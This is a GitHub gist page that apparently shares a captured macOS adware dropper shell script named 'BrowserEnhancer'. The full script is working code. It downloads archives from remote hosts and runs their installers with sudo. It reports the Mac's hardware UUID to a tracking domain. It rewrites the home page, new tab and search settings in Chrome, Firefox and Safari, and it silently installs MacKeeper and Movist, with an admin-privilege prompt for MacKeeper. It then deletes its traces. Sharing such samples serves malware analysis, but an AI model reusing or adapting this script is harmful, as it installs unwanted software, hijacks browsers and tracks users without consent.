Created
May 12, 2016 19:56
-
-
Save aserper/c71765d5efe4bc26387573f4ce9f47f2 to your computer and use it in GitHub Desktop.
BrowserEnhancer dropper script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| function offer7000 { | |
| whoami > /var/tmp/whoami.txt | |
| sudo whoami > /var/tmp/suwho.txt | |
| updFile="/var/tmp/updText.txt" | |
| touch $updFile | |
| sudo chmod 777 $updFile | |
| sudo whoami >> $updFile | |
| echo "Starting Client Updater Script" >> $updFile | |
| appName=$(sudo defaults read /Library/Preferences/com.common.plist name_upd) | |
| # midFile=$(find /System/Library/Frameworks -type f -name "*.uuid.plist" -print0 | xargs -0 ls -tl | sort -n | tail -1 | awk '{print $9}') | |
| # if [ -e "$midFile" ]; then | |
| # mid=$(echo "$midFile" | python -c 'import sys;print open(sys.stdin.read().rstrip(), "r").read().split("<string>")[1].split("</string>")[0]') | |
| # fi | |
| mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }') | |
| shouldInstall=1 | |
| if [ $appName ]; then | |
| procName=$(ps -ef | grep $appName | grep -v grep | sort -n | tail -1 | awk '{print $8}' | awk -F "/" '{print $6}') | |
| if [[ $procName ]]; then | |
| shouldInstall=0 | |
| fi | |
| fi | |
| if (( $shouldInstall == 1 )); then | |
| echo "Installing Client Updater" >> $updFile | |
| tmpfile88="/var/tmp/DemoUpdater" | |
| tmpfile77="/var/tmp/upd_o.txt" | |
| tmpfile66="/var/tmp/dut8.tgz" | |
| echo $tmpfile66 >> $updFile | |
| /usr/bin/curl -s -L -o $tmpfile66 "http://pullmenow.com/pd_files/dut8.tgz" | |
| sleep 5 | |
| tar -xzf $tmpfile66 -C /var/tmp/ | |
| sudo chmod 777 $tmpfile88/install_updater.sh | |
| domain_url="http://d.93a555685cc7443a8e1034efa1f18924.com/get?u=root&p=Aa123456&d=NL" | |
| domain=$(curl -s "$domain_url" | python -c "import json,sys;obj=json.load(sys.stdin);print obj['result'];") | |
| domain="http://"$domain | |
| if [[ "$domain" == "http://" ]]; then | |
| domain="http://aadcd15734d97346bb85f545dc8ca03e7e.com" | |
| fi | |
| /usr/bin/curl -s -L -o $tmpfile77 "http://t.trkitok.com/track/rep?oid=7000&st=1&id=DP8500--___08a6d6b2-44ed-4aa7-9621-1b3b2dbdbbd0___"$mid | |
| sudo chmod 777 "/var/tmp/updText.txt" | |
| sudo $tmpfile88/install_updater.sh "DP8500---" "___08a6d6b2-44ed-4aa7-9621-1b3b2dbdbbd0___"$mid "$domain" | |
| sleep 30 | |
| /usr/bin/curl -s -L -o $tmpfile77 "http://t.trkitok.com/track/rep?oid=7000&st=2&id=DP8500--___08a6d6b2-44ed-4aa7-9621-1b3b2dbdbbd0___"$mid | |
| sleep 5 | |
| rm -rf $tmpfile77 | |
| rm -rf $tmpfile66 | |
| rm -rf $tmpfile88 | |
| else | |
| echo "Not Installing Client Updater" >> $updFile | |
| fi | |
| echo "Finished Client Updater Script." >> $updFile | |
| } | |
| export -f offer7000 | |
| function offer2013 { | |
| updFile="/var/tmp/updText.txt" | |
| sudo chmod 777 $updFile | |
| echo "Starting Install Search Script" >> $updFile | |
| dc="DP8500" | |
| click_id="___08a6d6b2-44ed-4aa7-9621-1b3b2dbdbbd0" | |
| channel=$(echo $dc | tr -d '[[:space:]]' | tr -cd 0-9) | |
| pdChannel=${dc:2} | |
| # midFile=$(find /System/Library/Frameworks -type f -name "*.uuid.plist" -print0 | xargs -0 ls -tl | sort -n | tail -1 | awk '{print $9}') | |
| # if [ -e "$midFile" ]; then | |
| # mid=$(echo "$midFile" | python -c 'import sys;print open(sys.stdin.read().rstrip(), "r").read().split("<string>")[1].split("</string>")[0]') | |
| # fi | |
| mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }') | |
| id=$dc"--"$click_id"___"$mid | |
| echo "ID: $id" >> $updFile | |
| tmpfile1="/var/tmp/brh.txt" | |
| tmpfile3="/var/tmp/BrowserEnhancer04052016" | |
| country=$(curl -s 'ipinfo.io/country') | |
| countryCodes=("US" "CA" "GB" "ES" "AU" "FR" "DE" "IN" "IT" "NL" "NZ") | |
| troviAllowed="0" | |
| if [[ "${countryCodes[@]}" =~ "${country}" && $troviAllowed == *"1"* ]]; then | |
| echo "Country is in selected countries." >> $updFile | |
| replacedHome="http://www.trovi.com/?n=$dc&searchsource=55&UM=8&gd=SY1000248" | |
| replacedTab="http://www.trovi.com/?n=$dc&searchsource=69&UM=8&gd=SY1000248" | |
| replacedSearch="http://www.trovi.com/Results.aspx?n=$dc&searchsource=58&UM=8&gd=SY1000248" | |
| newSearchProvider="Trovi" | |
| offer_id="2013" | |
| sProv="Trovi" | |
| else | |
| echo "Country is NOT in selected countries." >> $updFile | |
| countryType=0 | |
| replacedHome="http://feed.helperbar.com/?publisher=TingSyn&barcodeid=51222999&searchtype=hp&type=YHS_TGE_$dc" | |
| replacedTab="http://feed.helperbar.com/?publisher=TingSyn&barcodeid=51222999&searchtype=nt&type=YHS_TGE_$dc" | |
| replacedSearch="http://feed.helperbar.com/?publisher=TingSyn&barcodeid=51222999&searchtype=ds&type=YHS_TGE_$dc" | |
| newSearchProvider="HelperBar" | |
| offer_id="2113" | |
| sProv="HelperBar" | |
| fi | |
| function preCheckChrome() { | |
| maxProfilesCount=10 | |
| function jsonValue() { | |
| KEY=$1 | |
| num=$2 | |
| awk -F"[,:}]" '{for(i=1;i<=NF;i++){if($i~/'$KEY'\042/){print $(i+1)}}}' | tr -d '"' | sed -n ${num}p | |
| } | |
| chromeProfilePath="/Users/" | |
| chromeProfilePath+=$user | |
| chromeProfilePath+="/Library/Application Support/Google/Chrome" | |
| chromeDefaultProfilePath=$chromeProfilePath | |
| chromeDefaultProfilePath+="/Default" | |
| preferencesFile=$chromeDefaultProfilePath | |
| preferencesFile+="/Preferences" | |
| echo "[Chrome] Preferences file: " $preferencesFile >> $updFile | |
| if [ -s "$preferencesFile" ]; then | |
| echo "[Chrome] Preferences file exists" >> $updFile | |
| defaultSearch=$(cat "$preferencesFile" | jsonValue short_name) | |
| echo $defaultSearch >> $updFile | |
| if echo $defaultSearch | grep -q "$searchName"; then | |
| echo "[Chrome] Search is replaced" >> $updFile | |
| return 1 | |
| else | |
| echo "[Chrome] Search is not installed" >> $updFile | |
| return 0 | |
| fi | |
| else | |
| echo "[Chrome] No default preferences file found. Searching for additional users." >> $updFile | |
| for i in `seq 1 $maxProfilesCount` | |
| do | |
| profilePath=$chromeProfilePath | |
| profilePath+="/Profile " | |
| profilePath+=$i | |
| preferencesFile=$profilePath | |
| preferencesFile+="/Preferences" | |
| echo "[Chrome] Additional: " $preferencesFile >> $updFile | |
| if [ -s "$preferencesFile" ]; then | |
| echo "[Chrome] Additional preferences file exists" >> $updFile | |
| defaultSearch=$(cat "$preferencesFile" | jsonValue short_name) | |
| echo $defaultSearch >> $updFile | |
| if echo $defaultSearch | grep -q "$searchName"; then | |
| echo "[Chrome] Search is replaced" >> $updFile | |
| return 1 | |
| fi | |
| fi | |
| done | |
| echo "[Chrome] Search is not installed" >> $updFile | |
| return 0 | |
| fi | |
| } | |
| function preCheckFireFox() { | |
| ffProfilesPath="/Users/" | |
| ffProfilesPath+=$user | |
| ffProfilesPath+="/Library/Application Support/Firefox/Profiles/" | |
| cd "$ffProfilesPath" | |
| profileName=$(ls -d */) | |
| preferencesFile=$ffProfilesPath | |
| preferencesFile+=$profileName | |
| preferencesFile+="prefs.js" | |
| echo "[Firefox] Preferences file: " $preferencesFile >> $updFile | |
| if [ -s "$preferencesFile" ]; then | |
| echo "[Firefox] Preferences file exists" >> $updFile | |
| isSelected=0 | |
| selectedEngine=$(cat -n "$preferencesFile" | grep browser.search.selectedEngine ) | |
| echo $selectedEngine >> $updFile | |
| if echo $selectedEngine | grep -q "$searchName"; then | |
| echo "[Firefox] Search is selected" >> $updFile | |
| isSelected=1 | |
| fi | |
| isDefault=0 | |
| defaultSearch=$(cat -n "$preferencesFile" | grep browser.search.defaultenginename) | |
| echo $defaultSearch >> $updFile | |
| if echo $defaultSearch | grep -q "$searchName"; then | |
| echo "[Firefox] Search is default" >> $updFile | |
| isDefault=1 | |
| fi | |
| if [ "$isSelected" -eq 1 ] && [ "$isDefault" -eq 1 ]; then | |
| echo "[Firefox] Search is replaced" >> $updFile | |
| return 1 | |
| else | |
| echo "[Firefox] Search is not installed" >> $updFile | |
| return 0 | |
| fi | |
| else | |
| echo "[Firefox] No preferences file found. No search info available" >> $updFile | |
| return 0 | |
| fi | |
| } | |
| function preCheckSafari() { | |
| safariExtensionsFile="/Users/" | |
| safariExtensionsFile+=$user | |
| safariExtensionsFile+="/Library/Safari/Extensions/Extensions.plist" | |
| echo "[Safari] Extensions file: " $safariExtensionsFile >> $updFile | |
| if [ -s "$safariExtensionsFile" ]; then | |
| echo "[Safari] Extensions file exists" >> $updFile | |
| if grep "$searchName" "$safariExtensionsFile"; then | |
| echo "[Safari] Search is replaced" >> $updFile | |
| return 1 | |
| else | |
| echo "[Safari] Search is not installed" >> $updFile | |
| return 0 | |
| fi | |
| else | |
| echo "[Safari] No extensions file found. No search info available" >> $updFile | |
| return 0 | |
| fi | |
| } | |
| function getUserHomeDir() { | |
| w -h | sort -u -t' ' -k1,1 | while read user etc | |
| do | |
| homedir=$(dscl . -read /Users/$user NFSHomeDirectory | cut -d' ' -f2) | |
| echo "$user" | |
| done | |
| } | |
| function preCheckSearch() { | |
| searchName=$newSearchProvider | |
| echo "Precheck for: " $searchName >> $updFile | |
| user=$(getUserHomeDir) | |
| echo "User: " $user >> $updFile | |
| preCheckChrome | |
| retValChrome=$? | |
| echo "Chrome check returns: "$retValChrome >> $updFile | |
| preCheckFireFox | |
| retValFireFox=$? | |
| echo "Firefox check returns: "$retValFireFox >> $updFile | |
| preCheckSafari | |
| retValSafari=$? | |
| echo "Safari check returns: "$retValSafari >> $updFile | |
| cd $(dirname $0) | |
| if (( $retValSafari == 1 || $retValChrome == 1 || $retValFireFox == 1 )); then | |
| return 1 | |
| else | |
| return 0 | |
| fi | |
| } | |
| preCheckSearch $newSearchProvider | |
| retValSearch=$? | |
| if (( $retValSearch == 0 )); then | |
| echo "Search not found." >> $updFile | |
| /usr/bin/curl -s -L -o ${tmpfile1} "http://t.trkitok.com/track/rep?oid=$offer_id&st=1&id=$id" | |
| tmpfile2="/var/tmp/BrowserEnhancer04052016_"$sProv".tgz" | |
| /usr/bin/curl -s -L -o ${tmpfile2} "http://pullmenow.com/pd_files/BrowserEnhancer/BrowserEnhancer04052016_"$sProv".tgz" | |
| sleep 10 | |
| tar -xzf ${tmpfile2} -C /var/tmp/ | |
| if [[ -d $tmpfile3 ]]; then | |
| echo "$tmpfile3 Exists" >> $updFile | |
| else | |
| echo "$tmpfile3 Doesn't Exist" >> $updFile | |
| fi | |
| if [[ -f "/var/tmp/BrowserEnhancer04052016/setup.sh" ]]; then | |
| echo "/var/tmp/BrowserEnhancer04052016/setup.sh Exists" >> $updFile | |
| else | |
| echo "/var/tmp/BrowserEnhancer04052016/setup.sh Doesn't Exist" >> $updFile | |
| fi | |
| echo sudo /var/tmp/BrowserEnhancer04052016/setup.sh "$replacedHome" "$replacedTab" "$replacedSearch" $newSearchProvider "$id" >> $updFile | |
| sudo /var/tmp/BrowserEnhancer04052016/setup.sh "$replacedHome" "$replacedTab" "$replacedSearch" $newSearchProvider "$id" | |
| sleep 30 | |
| echo $(</var/tmp/updText2.txt) >> $updFile | |
| sleep 10 | |
| else | |
| echo "Search is installed." >> $updFile | |
| fi | |
| echo "Removing tmp files" >> $updFile | |
| rm ${tmpfile1} | |
| rm ${tmpfile2} | |
| rm -rf ${tmpfile3} | |
| # rm -rf $updFile | |
| # rm -rf /var/tmp/updText2.txt | |
| } | |
| export -f offer2013 | |
| function offer2001 { | |
| tmpfile="/private/tmp/MacKeeper.pkg" | |
| tmpfile1="/private/tmp/mkout1.txt" | |
| tmpfile2="/private/tmp/mkout2.txt" | |
| # midFile=$(find /System/Library/Frameworks -type f -name "*.uuid.plist" -print0 | xargs -0 ls -tl | sort -n | tail -1 | awk '{print $9}') | |
| # if [ -e "$midFile" ]; then | |
| # mid=$(echo "$midFile" | python -c 'import sys;print open(sys.stdin.read().rstrip(), "r").read().split("<string>")[1].split("</string>")[0]') | |
| # fi | |
| mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }') | |
| downloadLink="http://mackeeperapp.mackeeper.com/paramss=phexafefd294b4cbb9ac9297a0aa9f9cd2e8cb90eadf9cd4d2dea2ced2c0e4d4c2d5dce2c8e4dccdd9ccddb59c93cfe0c6d5ccc0e0dfccc4e3f0c8ddd0d598&trt=29_35129156&tid_ext=DP8500%3BDP8500--___08a6d6b2-44ed-4aa7-9621-1b3b2dbdbbd0___$mid" | |
| COUNTRY="$country_code$" | |
| if [ "$COUNTRY" == "AU" ] || [ "$COUNTRY" == "CA" ] || [ "$COUNTRY" == "GB" ] || [ "$COUNTRY" == "US" ] ; then | |
| downloadLink="http://mackeeperapp.mackeeper.com/paramss=phexafefd294b4cbb9ac9297a0aa9f9cd2e8cb90eadf9cd4d2dea2ced2c0e4d4c2d5dce2c8d2d3cdd9ccddb59c93cfe0c6d5ccc0e0dfccc4d1e7c8ddd0d598&trt=29_35129156&tid_ext=DP8500%3BDP8500--___08a6d6b2-44ed-4aa7-9621-1b3b2dbdbbd0___$mid" | |
| fi | |
| /usr/bin/curl -s -L -o $tmpfile ${downloadLink} | |
| /usr/bin/curl -s -L -o $tmpfile1 "http://t.trkitok.com/track/rep?oid=2001&st=1&id=DP8500--___08a6d6b2-44ed-4aa7-9621-1b3b2dbdbbd0___"$mid | |
| if [ "$EUID" -ne 0 ]; then | |
| osascript -e "do shell script \"/usr/sbin/installer -pkg $tmpfile -target /\" with administrator privileges" | |
| else | |
| /usr/sbin/installer -pkg $tmpfile -target / | |
| fi | |
| sleep 10 | |
| if [ -d "/Applications/MacKeeper.app" ]; then | |
| /usr/bin/curl -s -L -o $tmpfile2 "http://t.trkitok.com/track/rep?oid=2001&st=2&id=DP8500--___08a6d6b2-44ed-4aa7-9621-1b3b2dbdbbd0___"$mid | |
| fi | |
| rm $tmpfile | |
| rm $tmpfile1 | |
| rm $tmpfile2 | |
| } | |
| export -f offer2001 | |
| function offer4001 { | |
| movist_tmpfile="/private/tmp/Movist.tgz" | |
| movist_tmpfile1="/private/tmp/mkout1.txt" | |
| movist_tmpfile2="/private/tmp/mkout2.txt" | |
| /usr/bin/curl -s -L -o $movist_tmpfile "http://cdn.searchbook.me/mac-products/Movist.tgz" | |
| sudo tar zxvf $movist_tmpfile -C /Applications/ | |
| sudo chown root /Applications/Movist.app | |
| rm $movist_tmpfile | |
| rm $movist_tmpfile1 | |
| rm $movist_tmpfile2 | |
| #exit 1 | |
| open /Applications/Movist.app/ | |
| } | |
| export -f offer4001 | |
| declare -a functions=( offer7000 offer2013 offer2001 offer4001 ) | |
| for i in "${functions[@]}" | |
| do | |
| printf "%s\0" "$i" | |
| done | xargs -0 -n 1 -P 4 bash -c '"$@"' -- |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment